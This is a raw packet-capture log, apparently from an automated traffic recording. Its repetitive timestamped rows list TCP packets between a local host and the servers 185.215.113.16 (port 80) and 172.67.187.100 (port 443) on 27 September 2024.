                                                                                                                                                                Sep 27, 2024 17:42:04.142298937 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142313004 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142332077 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142343044 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142364025 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142373085 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142400980 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142407894 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142433882 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142441988 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142466068 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142474890 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142498970 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142508030 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142529964 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142543077 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142560959 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142573118 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142592907 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142605066 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142625093 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142637968 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142657995 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142669916 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142689943 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142708063 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142723083 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142735004 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142755032 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142767906 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142787933 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142801046 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142819881 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142832994 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142853975 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142863035 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142887115 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142904043 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142920017 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142929077 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142955065 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.142961979 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.142988920 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143001080 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143021107 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143029928 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143055916 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143069029 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143089056 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143100977 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143121004 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143131971 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143150091 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143162966 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143182039 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143199921 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143223047 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143232107 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143264055 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143282890 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143296003 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143311977 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143326998 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143337965 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143358946 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143373013 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143408060 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143410921 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143443108 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143455982 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143477917 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143485069 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143510103 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143518925 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143542051 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143553972 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143585920 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143598080 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143618107 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143630981 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143651009 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143659115 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143682957 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143711090 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143714905 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143732071 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143743038 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143759012 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143774986 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143786907 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143811941 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143829107 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143845081 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143856049 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143877029 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143886089 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143909931 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143919945 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143943071 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143950939 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.143975973 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.143990993 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.144021034 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.192840099 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.192894936 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.192918062 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.192949057 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.192962885 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.192998886 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.192998886 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193031073 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193051100 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193063974 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193075895 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193095922 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193108082 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193125963 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193145990 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193171978 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193173885 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193206072 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193213940 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193237066 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193262100 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193269968 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193279982 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193301916 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193309069 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193335056 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193347931 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193366051 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193382978 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.193417072 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.193454981 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.228836060 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.228972912 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229000092 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229010105 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229021072 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229032040 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229043007 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229046106 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229053974 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229064941 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229077101 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229089022 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229123116 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229140997 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229161978 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229171991 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229182959 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229187965 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229198933 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229204893 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229209900 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229227066 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229276896 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229288101 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229331017 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229439020 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229449987 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229460001 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229469061 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229477882 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229480028 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229490042 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229501009 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229501963 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229511023 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229522943 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229545116 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229566097 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229645014 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229655981 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229686022 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229711056 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229825020 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229835987 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229846001 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229856014 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229866982 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229876995 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229877949 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229885101 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229896069 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229906082 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229912996 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229917049 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229928017 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229934931 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229938984 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.229960918 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.229979992 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230082035 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230123997 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230148077 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230159044 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230169058 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230179071 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230189085 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230190039 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230211020 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230245113 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230329990 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230340004 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230350971 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230362892 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230374098 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230380058 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230389118 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230392933 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230400085 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230432034 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230460882 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230468988 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230479002 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230514050 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230564117 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230575085 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230585098 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230598927 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230606079 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230609894 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230621099 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230632067 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230642080 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230643034 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230686903 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230907917 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230918884 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230928898 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230938911 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230948925 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230950117 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230958939 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230969906 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230979919 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.230987072 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.230989933 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.231028080 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.231044054 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.231122017 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.231132030 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.231144905 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.231161118 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.231183052 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.264982939 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265017986 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265069962 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265099049 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265103102 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265152931 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265167952 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265203953 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265221119 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265254021 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265265942 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265299082 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265300989 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265331984 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265343904 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265363932 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265373945 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265398026 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265408993 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265430927 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265440941 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265464067 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.265474081 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.265511990 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.942796946 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.943214893 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.047447920 CEST8049738185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.047992945 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.048221111 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.048675060 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.050074100 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.050112963 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.050189018 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.050443888 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.051907063 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.051918983 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.055258036 CEST8049738185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.513871908 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.514197111 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.515856028 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.515866995 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.516182899 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.570457935 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.615396976 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.763284922 CEST8049738185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.763405085 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.879462004 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.879822969 CEST4974080192.168.2.4185.215.113.16
